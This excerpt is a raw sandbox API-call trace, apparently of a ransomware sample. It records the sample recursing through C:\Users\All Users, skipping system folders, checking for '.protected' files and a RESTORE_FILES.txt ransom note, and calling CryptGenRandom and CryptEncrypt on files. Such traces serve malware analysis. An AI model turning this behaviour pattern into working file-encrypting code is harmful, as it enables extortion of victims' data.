lpSrch=".protected") returned=".protected" [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="Program Files") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="Program Files (x86)") returned -1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="AdbeRdrUpd10116_MUI.msp.protected", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.protected") returned 80 [0093.104] StrStrIW (lpFirst="AdbeRdrUpd10116_MUI.msp.protected", lpSrch=".protected") returned=".protected" [0093.104] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt") returned 64 [0093.104] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.104] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.104] FindNextFileW (in: 
hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.104] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt") returned 64 [0093.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.104] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.104] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.105] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.105] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.105] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\RESTORE_FILES.txt") returned 50 [0093.105] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.105] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.105] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.105] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.105] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\RESTORE_FILES.txt") 
returned 50 [0093.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\arm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.106] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.106] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.106] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\RESTORE_FILES.txt") returned 46 [0093.106] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.106] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.106] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0093.106] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0093.106] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Adobe\\RESTORE_FILES.txt") returned 46 [0093.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.106] FindNextFileW (in: hFindFile=0x47b950, 
lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0093.106] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0093.106] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data") returned 39 [0093.106] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0093.106] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0093.106] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data\\*") returned 41 [0093.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.106] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0093.106] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0093.106] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop") returned 30 [0093.106] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0093.107] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0093.107] 
wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop\\*") returned 32 [0093.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.107] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0093.107] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0093.107] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents") returned 32 [0093.107] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0093.107] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0093.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents\\*") returned 34 [0093.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.107] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="Windows") returned -1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="Program Files") returned -1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="Program Files (x86)") returned -1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="$Recycle.bin") returned 1 [0093.107] lstrcmpiW (lpString1="Favorites", lpString2="System Volume Information") returned -1 
[0093.107] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Favorites") returned 32 [0093.107] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0093.107] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0093.107] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Favorites\\*") returned 34 [0093.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0093.107] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0093.107] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0093.107] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft") returned 32 [0093.107] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0093.108] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0093.108] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\*") returned 34 [0093.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0093.108] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.108] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.108] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.108] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.108] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.108] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\.") returned 34 [0093.108] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.108] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.108] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.108] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.108] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\." (normalized: "c:\\users\\all users\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.108] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.108] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.108] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.108] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.108] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.108] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.108] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\..") returned 35 [0093.108] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.108] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.108] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.108] lstrcmpW 
(lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.108] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0093.108] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0093.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\.." (normalized: "c:\\users\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.108] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.108] lstrcmpiW (lpString1="Assistance", lpString2="Windows") returned -1 [0093.108] lstrcmpiW (lpString1="Assistance", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1="Assistance", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1="Assistance", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1="Assistance", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned 43 [0093.109] lstrcmpW (lpString1="Assistance", lpString2=".") returned 1 [0093.109] lstrcmpW (lpString1="Assistance", lpString2="..") returned 1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*") returned 45 [0093.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.109] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.109] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0093.109] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\.") returned 45 [0093.109] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.109] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.109] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.109] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\..") returned 46 [0093.109] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.109] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.109] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="Windows") returned -1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="Program Files") returned -1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="Program Files (x86)") returned -1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="$Recycle.bin") returned 1 [0093.109] lstrcmpiW (lpString1="Client", lpString2="System Volume Information") returned -1 [0093.109] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned 50 [0093.110] lstrcmpW 
(lpString1="Client", lpString2=".") returned 1 [0093.110] lstrcmpW (lpString1="Client", lpString2="..") returned 1 [0093.110] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*") returned 52 [0093.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.110] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.110] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.110] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.110] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.110] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.110] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\.") returned 52 [0093.110] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.110] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.110] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.110] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.110] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.111] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.111] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\..") returned 53 [0093.111] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.111] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.111] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="Windows") returned -1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="Program Files") returned -1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="$Recycle.bin") returned 1 [0093.111] lstrcmpiW (lpString1="1.0", lpString2="System Volume Information") returned -1 [0093.111] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned 54 [0093.111] lstrcmpW (lpString1="1.0", lpString2=".") returned 1 [0093.111] lstrcmpW (lpString1="1.0", lpString2="..") returned 1 [0093.111] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*") returned 56 [0093.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.111] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.111] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.111] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.111] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.111] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\.") returned 56 [0093.111] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.111] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.111] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.111] 
lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.111] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.112] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.112] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\..") returned 57 [0093.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.112] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.112] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.112] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 60 [0093.112] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.112] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.112] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned 62 [0093.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.112] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.112] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.112] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.112] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.112] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.112] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\.") returned 62 [0093.112] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.112] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.112] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.112] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\..") returned 63 [0093.113] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.113] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_CValidator.H1D.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D.protected") returned 90 [0093.113] StrStrIW (lpFirst="Help_CValidator.H1D.protected", lpSrch=".protected") returned=".protected" [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="Program Files") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="Program Files (x86)") returned -1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="$Recycle.bin") returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_AssetId.H1W.protected", lpString2="System Volume Information") returned -1 [0093.113] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.protected") returned 92 [0093.113] StrStrIW (lpFirst="Help_MKWD_AssetId.H1W.protected", lpSrch=".protected") returned=".protected" [0093.113] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.113] lstrcmpiW (lpString1="Help_MKWD_BestBet.H1W.protected", lpString2="Windows") returned -1 [0093.113] lstrcmpiW 